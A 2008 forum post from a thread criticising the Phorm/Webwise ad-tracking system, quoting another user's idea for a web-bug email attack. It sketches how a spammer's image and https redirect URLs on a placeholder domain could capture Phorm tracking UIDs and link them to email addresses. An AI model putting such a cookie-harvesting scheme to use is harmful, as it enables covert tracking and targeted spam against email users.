Thread: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
View Single Post
Old 15-04-2008, 15:12   #3426
Florence
cf.mega poster
 
Florence's Avatar
 
Join Date: Jun 2003
Services: The wonders of Sky TV BT line and Aquiss.net ADSL cable dies on 5th RIP VM.
Posts: 4,013
Florence has disabled reputation
Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
Another exploit found in phorm http://www.ispreview.co.uk/talk/show...3&postcount=21

Quote:
posted by Mel on ISPreview.
Do any modern email clients still share cookies with a browser? Hmm, I guess webmail services.

Only it occurred to me that by spamming 'everybody'@a_phorming_isp.com with an html email that contained a webbug designed to capture the UID, it might be possible for a spammer to compile a database of UIDs linked to email addresses.

The webbug could be an http: image link containing the email address it was sent to (ie your email address) suitably escaped eg:-

http://somespammer.con/uidcaptureYourEmailAddress.jpg

If you view the email your client would request the image,

phorm would use its triple redirect jiggery-pokery to intercept this request and copy the webwise.net UID to a webwise cookie in somespammmer's domain.

The spammer's server would reply with a redirect to a https: php script eg

https://somespammer.con/uidcaptureYourEmailAddress.php

The client automatically requests the https: url sending the webwise UID cookie.

Using https: bypasses phorm's intercept of the UID cookie, delivering the UID and email address to the spammer.

The spammer then sells a service to websites that allows them to email targeted spam to visitors to their website.
__________________
I'm enjoying Aquiss. Are you? Now happily surfing the internet phorm phree long may my surfing be phree of spyware.
nice one Good luck all.no need to hang around no longer cable customer
Florence is offline